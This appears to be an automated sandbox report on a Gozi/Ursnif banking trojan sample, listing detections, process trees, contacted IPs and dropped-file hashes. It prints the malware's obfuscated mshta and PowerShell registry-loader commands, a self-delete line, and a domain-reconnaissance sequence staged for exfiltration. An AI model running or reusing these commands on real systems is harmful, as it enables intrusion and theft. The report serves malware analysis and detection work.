Malware Analysis Report

2025-08-05 13:07

Sample ID 220322-s48daacfck
Target d41d05cc157f874f89c574c74c0e2c58
SHA256 0d4702dec67009d0728ce6da88bd91bf5e70a526cf0688cc7c7586937cf06cb2
Tags
gozi_ifsb 777999 banker suricata trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0d4702dec67009d0728ce6da88bd91bf5e70a526cf0688cc7c7586937cf06cb2

Threat Level: Known bad

The file d41d05cc157f874f89c574c74c0e2c58 was found to be: Known bad.

Malicious Activity Summary

gozi_ifsb 777999 banker suricata trojan

Gozi, Gozi IFSB

suricata: ET MALWARE Ursnif Variant CnC Data Exfil

suricata: ET MALWARE Ursnif Variant CnC Beacon

suricata: ET MALWARE Ursnif Payload Request (cook64.rar)

suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)

suricata: ET MALWARE Ursnif Payload Request (cook32.rar)

Deletes itself

Checks computer location settings

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Runs ping.exe

Runs net.exe

Enumerates processes with tasklist

Discovers systems in the same network

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Suspicious behavior: MapViewOfSection

Suspicious use of SetWindowsHookEx

Suspicious behavior: CmdExeWriteProcessMemorySpam

Gathers system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-22 15:41

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-22 15:41

Reported

2022-03-22 15:47

Platform

win7-20220311-en

Max time kernel

4294180s

Max time network

120s

Command Line

C:\Windows\Explorer.EXE

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

suricata: ET MALWARE Ursnif Payload Request (cook32.rar)

suricata

suricata: ET MALWARE Ursnif Payload Request (cook64.rar)

suricata

suricata: ET MALWARE Ursnif Variant CnC Beacon

suricata

suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)

suricata

suricata: ET MALWARE Ursnif Variant CnC Data Exfil

suricata

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1608 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe
PID 1608 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe
PID 1608 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe
PID 1608 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe
PID 1608 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe
PID 1608 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe
PID 1928 wrote to memory of 532 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 532 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 532 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 532 wrote to memory of 1452 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 532 wrote to memory of 1452 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 532 wrote to memory of 1452 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1452 wrote to memory of 1616 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1452 wrote to memory of 1616 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1452 wrote to memory of 1616 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 532 wrote to memory of 1696 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 532 wrote to memory of 1696 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 532 wrote to memory of 1696 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1696 wrote to memory of 1344 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1696 wrote to memory of 1344 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1696 wrote to memory of 1344 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 532 wrote to memory of 1192 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 532 wrote to memory of 1192 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 532 wrote to memory of 1192 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1192 wrote to memory of 1912 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 1192 wrote to memory of 1912 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 1192 wrote to memory of 1912 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 1192 wrote to memory of 1912 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 1192 wrote to memory of 1912 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 1192 wrote to memory of 1912 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 1912 wrote to memory of 1604 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1912 wrote to memory of 1604 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1912 wrote to memory of 1604 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1912 wrote to memory of 1604 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1912 wrote to memory of 1604 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1912 wrote to memory of 1604 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1192 wrote to memory of 1652 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1192 wrote to memory of 1652 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1192 wrote to memory of 1652 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 1796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 1652 wrote to memory of 1796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 1652 wrote to memory of 1796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 1192 wrote to memory of 908 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1192 wrote to memory of 908 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1192 wrote to memory of 908 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1192 wrote to memory of 1708 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1192 wrote to memory of 1708 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1192 wrote to memory of 1708 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1708 wrote to memory of 1308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 1708 wrote to memory of 1308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 1708 wrote to memory of 1308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 1192 wrote to memory of 1452 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1192 wrote to memory of 1452 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1192 wrote to memory of 1452 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1192 wrote to memory of 1452 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1192 wrote to memory of 1452 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1192 wrote to memory of 1452 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1192 wrote to memory of 1452 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1192 wrote to memory of 1224 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1192 wrote to memory of 1224 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1192 wrote to memory of 1224 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1192 wrote to memory of 1812 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1192 wrote to memory of 1812 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1192 wrote to memory of 1812 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe

"C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"

C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe

"C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Te7a='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Te7a).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\1F204AFB-F2EE-A981-F4C3-46ED68A7DA71\\\OperatorMask'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name sjndtifo -value gp; new-alias -name hlshhlju -value iex; hlshhlju ([System.Text.Encoding]::ASCII.GetString((sjndtifo "HKCU:Software\AppDataLow\Software\Microsoft\1F204AFB-F2EE-A981-F4C3-46ED68A7DA71").ClassControl))

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tmcimu1x.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDDC3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDDB2.tmp"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x0tccqdc.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDE4F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDE4E.tmp"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"

C:\Windows\system32\PING.EXE

ping localhost -n 5

C:\Windows\system32\cmd.exe

cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\71B8.bi1"

C:\Windows\system32\nslookup.exe

nslookup myip.opendns.com resolver1.opendns.com

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\71B8.bi1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\net.exe

net config workstation

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 config workstation

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts /all_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\net.exe

net view /all /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\net.exe

net view /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\B64C.bin1 > C:\Users\Admin\AppData\Local\Temp\B64C.bin & del C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

Network

Country Destination Domain Proto
US 13.107.42.16:80 config.edge.skype.com tcp
NL 146.70.35.138:80 146.70.35.138 tcp
US 8.8.8.8:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
BE 193.56.146.148:80 193.56.146.148 tcp
US 13.107.42.16:80 config.edge.skype.com tcp
CA 67.43.234.14:80 67.43.234.14 tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.0.0.127.in-addr.arpa udp

Files

memory/976-54-0x0000000000400000-0x000000000040D000-memory.dmp

memory/976-56-0x0000000000400000-0x000000000040D000-memory.dmp

memory/976-58-0x0000000000400000-0x000000000040D000-memory.dmp

memory/976-59-0x0000000000300000-0x0000000000302000-memory.dmp

memory/532-60-0x000007FEFB9A1000-0x000007FEFB9A3000-memory.dmp

memory/532-61-0x000007FEF4810000-0x000007FEF536D000-memory.dmp

memory/532-62-0x000007FEF2920000-0x000007FEF32BD000-memory.dmp

memory/532-63-0x00000000025DB000-0x00000000025FA000-memory.dmp

memory/532-64-0x00000000025D0000-0x00000000025D2000-memory.dmp

memory/532-66-0x00000000025D2000-0x00000000025D4000-memory.dmp

memory/532-65-0x000007FEF2920000-0x000007FEF32BD000-memory.dmp

memory/532-67-0x00000000025D4000-0x00000000025D7000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\tmcimu1x.cmdline

MD5 15beada1ff111d2111664d37aaf6a3d4
SHA1 3b3734ea064429e762cd5486d0fba04face5b383
SHA256 a889253f6e529a3d1e1c73161d517cb354df6ab9f610dcdac4ccce92d8b0d57f
SHA512 23af14c5a9ae82856dd6d218fbcde47eb931ba4d86f3b137a13736de57a56319f87190873be7fd96908f175f4ae256ce3ada379cf2a3c55a65ff0b5c6e9d43d1

\??\c:\Users\Admin\AppData\Local\Temp\tmcimu1x.0.cs

MD5 0b7537cf8128ca1320d7bf219bb65b46
SHA1 33ca68f06067df84baa078137f1285102d30cb3a
SHA256 42fffdc792c601ba88907615926489b19aec09d687260f8d9a7955650a7756a8
SHA512 3cdc646a28f237b5607aedd68eb11d3f819b3e71773b7bc6294c7e8c985a821049f0a29be9a5eaf6d688df068eea38a749a87b461454ed311e636008c670b276

\??\c:\Users\Admin\AppData\Local\Temp\CSCDDB2.tmp

MD5 6155564f545bc7f2cb1fbf3bf402fc0f
SHA1 3fa34f6832a5d791a07eccf2194017f5550b92ae
SHA256 6bc73eab373f815cd2c2ee1bc8a5f6446bccf546823d02034062de05986e92f7
SHA512 911014c774ad35efd2fcffadf49e7ad66b4fcd5563a1139378edd926ffd2f6711a449d5da7dd67b24813251dcaba7d5b51ebb022034b4f9c017938007f762503

C:\Users\Admin\AppData\Local\Temp\RESDDC3.tmp

MD5 2130a1b34a8cd0007d613fa90e2149ca
SHA1 1bd6e3e50e720e872e9905a8a7e513c1c0ad957e
SHA256 f4fa8084ddadf6b9c38b1ab21c5d7495aac2e2e7dc2930f5a85a721df69cbbe7
SHA512 6243fb2dd1495ed6063c2a0ba6616a1688be1b6cab2553cac663f76829b1aa3d5e0addcdbafc228f26d04e234789b9011b6b5892cb2c165d65602d9dc6a4bcb4

C:\Users\Admin\AppData\Local\Temp\tmcimu1x.dll

MD5 34da9fbc2b5780708c9b9297ac7a0099
SHA1 f26f5d59c64cd80f4130e91deda368ffa563050b
SHA256 358e8b87028e904eb6c077d59cd3d6f522520a17000eb570602f8c7d5f1f970a
SHA512 7d83f60f41a9ad222f547453f471e2258127908ee63c19016e9b95c4ba971975e456082d4604470f8e7101428ffad6a23e9c1e469a0c7e538bb80f41e0345d92

C:\Users\Admin\AppData\Local\Temp\tmcimu1x.pdb

MD5 5e900832af8d48e74256b774cc47227b
SHA1 37a88311c763435c8c836b888f9b5c0bf4c1978a
SHA256 63692d815920b4807045b051d001f9f1766ffba38db20d96fc2a0c5c04229a72
SHA512 f1d7d9c6f3697e4b50ed2f68f8d5b462703532e457536700154afc7c109bc2e535ee5753cec5fed353e803d313b8acdc74c73caaef734e0c83b1174590366d68

\??\c:\Users\Admin\AppData\Local\Temp\x0tccqdc.cmdline

MD5 40dea05550e17a81fe9b98e76d0e5a72
SHA1 03367f9c3dc8a0bf6924fadd7454615aa18437b9
SHA256 e984e36cff12604a2c56c30270599c39f963b0bf28a72399058cb0aa843ab943
SHA512 a69bcfc8fd99a5e3afc2b8e8cd01860fa898b1ac705c17a9c6302990d81ea3047b185881881578d0e65f0d11748dffe635865d46871bc5a22a17ceb5e57476d7

\??\c:\Users\Admin\AppData\Local\Temp\x0tccqdc.0.cs

MD5 35b3f48ba529849ae98e5f2c89b802f6
SHA1 e6ac7f0dff73e320ab7c09f5abb45dede87cfe81
SHA256 f8708957c3c4032d98bcdb50008ff132f1cef7b839521dc4ab9c22ba91a3bb61
SHA512 b6559f6f80520c9a29b1534022483cf2fcae200cac9c4c640cc2db9a7a1588122480f84561f858789067916e455aea57e45b346edb93dcd4a966b2ee4be7e153

\??\c:\Users\Admin\AppData\Local\Temp\CSCDE4E.tmp

MD5 85f7524f460ef4f7956c4cc6a4fcd64d
SHA1 7a3b327c2540d11d1dd814d2413311d0e84d5379
SHA256 03a94a3b0df48af69e29df962a0d1d9a809adafe1083c5efdcd7da896d8dcade
SHA512 b956c74d46f7d823cc3bd5aff1571ff02782de3a016729018359962796d9361b3a29cf61a5898b81a2dab51dd2e92830dc80ae72ec16cadd3d84fe95f611cfe8

C:\Users\Admin\AppData\Local\Temp\RESDE4F.tmp

MD5 9a367b111333f6600f238af34f8f5baf
SHA1 96f5271d8af02af8edf8a93ebdf5ee72d13f71a1
SHA256 fbf7317bce44bed255a35ec05738a5c47e1ff7de889046afd1526f8781b900e1
SHA512 ac7443ce7e9b1e476bfb77239209a36e6e6b3fb0e0fdd806c60c41c8883e02f782b6d62c91e0739ed655cfcfb5ad9ac06299b4a2768d16412ccecb0cd5294290

C:\Users\Admin\AppData\Local\Temp\x0tccqdc.dll

MD5 46526cabf88f54424ecd4d4b5172ead9
SHA1 38a5e9896a7ba474737fcd98bcf4689a7cd3083f
SHA256 9ab38ff5d12836ed280c179fa3b0f6ee4aa2e3472bec63b13e86fd01106c3f78
SHA512 db155e743c2bd8fe12850787ae11ea0e1cb936a3878e5d8613fb6e4259ab11cdee3229ed7f4c533b5f9489dcd4b15e04d0b827ba8a19338001803a55c22e5ff9

C:\Users\Admin\AppData\Local\Temp\x0tccqdc.pdb

MD5 9943a97c2546a933ec8061d3a2c7f20d
SHA1 24529d1927e59e8bb8a8a9707ee6dfc6a111030a
SHA256 5eb093c79ea27223a418c333a7e0c08d91b162405053c2e05fa8cd88eec75069
SHA512 77ce76e60644fbc753b4026fe2c247012b7238a1d35747e6ecc518b097d7b282576aaac15c679180377e3aa5c86e49f70709c186c7721c2a97b80735d6bbb3e8

memory/532-80-0x000000001B660000-0x000000001B6A4000-memory.dmp

memory/1912-81-0x00000000003D0000-0x00000000003D1000-memory.dmp

memory/1192-82-0x0000000002230000-0x0000000002231000-memory.dmp

memory/1192-83-0x00000000043A0000-0x0000000004458000-memory.dmp

memory/1912-84-0x0000000000310000-0x00000000003C8000-memory.dmp

memory/1604-86-0x0000000000180000-0x0000000000238000-memory.dmp

memory/1604-85-0x0000000000440000-0x0000000000441000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\71B8.bi1

MD5 4f6429322fdfd711b81d8824b25fcd9c
SHA1 f7f917b64dd43b620bacd21f134d430d3c406aec
SHA256 d22c844d015c874bbdbeb12b73ef54585cbd435c28f50d536fb4ace26d859ed8
SHA512 e661f8d79b031a4a043a388ec17d82b5092859ac1d0ce6668a082feecf1da5665837ad1ef984751c7be174bbb6c1012f45d9f550d5cf65dc8b0e6cddcbdb0816

C:\Users\Admin\AppData\Local\Temp\71B8.bi1

MD5 4f6429322fdfd711b81d8824b25fcd9c
SHA1 f7f917b64dd43b620bacd21f134d430d3c406aec
SHA256 d22c844d015c874bbdbeb12b73ef54585cbd435c28f50d536fb4ace26d859ed8
SHA512 e661f8d79b031a4a043a388ec17d82b5092859ac1d0ce6668a082feecf1da5665837ad1ef984751c7be174bbb6c1012f45d9f550d5cf65dc8b0e6cddcbdb0816

memory/1452-89-0x0000000000280000-0x000000000032A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B64C.bin1

MD5 16a78e06ec1b6b7397cd605b06803c30
SHA1 9cd7393bb635ac0b2bee2bd49a06c61c182abeb5
SHA256 1c67ad23f21bde03b5a6370531bed0a66e66ca693face7191ee1daa4f89a9969
SHA512 4e661e952270f9cb23ebdc68f06d39bd26984c840956933c427e6cbe3c63c9dfb91f5f989cafbabeb1b5386800c01cc7be3eea1932f4235d21ace17b07297a0f

C:\Users\Admin\AppData\Local\Temp\B64C.bin1

MD5 16a78e06ec1b6b7397cd605b06803c30
SHA1 9cd7393bb635ac0b2bee2bd49a06c61c182abeb5
SHA256 1c67ad23f21bde03b5a6370531bed0a66e66ca693face7191ee1daa4f89a9969
SHA512 4e661e952270f9cb23ebdc68f06d39bd26984c840956933c427e6cbe3c63c9dfb91f5f989cafbabeb1b5386800c01cc7be3eea1932f4235d21ace17b07297a0f

C:\Users\Admin\AppData\Local\Temp\B64C.bin1

MD5 dd5f14eb370daa1154aae7d403b47491
SHA1 6378a5a8b8a8e727e83bff849a88a1ca2ba4308a
SHA256 9b4c1cdd57a81d15681599299de0f987d45ced8c0951384f3d644e72ce35456f
SHA512 8b12b725947cfdb87f30dda9100786c50ce7144103ce3f17398335a0bfa82dec8f469259916959ae164633576c8648db4bb83bdf27ee998b040cba369995852d

C:\Users\Admin\AppData\Local\Temp\B64C.bin1

MD5 dd5f14eb370daa1154aae7d403b47491
SHA1 6378a5a8b8a8e727e83bff849a88a1ca2ba4308a
SHA256 9b4c1cdd57a81d15681599299de0f987d45ced8c0951384f3d644e72ce35456f
SHA512 8b12b725947cfdb87f30dda9100786c50ce7144103ce3f17398335a0bfa82dec8f469259916959ae164633576c8648db4bb83bdf27ee998b040cba369995852d

C:\Users\Admin\AppData\Local\Temp\B64C.bin1

MD5 149dff51cd2f314a298e771fc72d03f0
SHA1 c7caa03e052c647a898afaad47b002aa9534cb41
